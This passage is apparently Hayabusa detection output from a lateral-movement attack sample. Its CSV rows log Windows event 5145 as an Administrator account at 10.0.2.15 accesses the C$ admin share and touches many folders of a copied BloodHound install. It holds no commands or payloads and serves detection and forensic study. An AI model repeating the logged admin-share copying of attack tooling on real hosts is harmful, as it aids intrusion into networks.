0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 